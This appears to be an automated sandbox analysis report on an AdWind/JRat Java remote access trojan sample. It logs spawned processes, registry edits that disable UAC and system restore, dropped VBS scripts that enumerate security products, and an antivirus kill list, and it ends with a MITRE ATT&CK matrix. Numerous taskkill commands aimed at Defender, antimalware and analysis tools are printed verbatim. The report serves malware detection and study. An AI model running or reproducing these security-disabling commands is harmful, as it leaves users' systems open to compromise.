        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /eJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbsJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Usc4>
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}#
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Us
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerkv;
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi;2>
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 2_2_02DF03C0 cpuid 2_2_02DF03C0
        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersionJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersionJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7388 VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jartracer.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7564 VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7620 VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A93DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_73A93DFC
        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Disable UAC(promptonsecuredesktop)
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: PromptOnSecureDesktop 0
        Disables UAC (registry)
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
        Disables Windows system restore
        Source: C:\Windows\SysWOW64\regedit.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR
        Disables zone checking for all users
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EMLPROXY.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AVKService.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fsgk32.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AVKProxy.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AVKTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBAMTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7RTScan.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FSMA32.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ONLINENT.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SCANWSCS.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SUPERAntiSpyware.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7FWSrvc.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: guardxservice.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7PSSrvc.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: acs.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7TSMngr.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BullGuard.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wireshark.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: virusutilities.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K7EmlPxy.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ClamTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBAMSvc.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
        Source: cscript.exe, 0000000B.00000003.1684085161.000000000333E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1684309240.0000000003342000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1684930666.0000000003343000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1683697790.0000000003359000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684820314.0000000003585000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000002.1685492246.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684796867.00000000035C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FPAVServer.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: mbam.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FProtTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ClamWin.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: op_mon.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;
        Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
        Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
        Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
        Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

        Stealing of Sensitive Information

        barindex
        Yara detected AdWind RATs dll
        Source: Yara matchFile source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED

        Remote Access Functionality

        barindex
        Detected ADWIND Rat
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
        Yara detected AdWind RATs dll
        Source: Yara matchFile source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED
        Java source code contains strings found in CrossRAT
        Source: _0.337891030941391956323023258775833856.class.6.drSuspicious string: operational.JRat (in operational/Jrat.java)
        Source: krmyqqmohp.txt.5.drSuspicious string: operational.JRat (in operational/Jrat.java)
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A911B0 _Java_com_Title_disableListener@8,6_2_73A911B0
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 6_2_73A91110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW,6_2_73A91110

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information11
        Scripting        		Valid Accounts11
        Windows Management Instrumentation        		11
        Scripting        		1
        DLL Side-Loading        		311
        Disable or Modify Tools        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        Inhibit System Recovery
        CredentialsDomainsDefault Accounts2
        Native API        		1
        DLL Side-Loading        		1
        Bypass User Account Control        		1
        Obfuscated Files or Information        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution        		11
        Image File Execution Options Injection        		11
        Image File Execution Options Injection        		1
        Timestomp        		Security Account Manager34
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Remote Access Software        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCron1
        Registry Run Keys / Startup Folder        		12
        Process Injection        		1
        DLL Side-Loading        		NTDS231
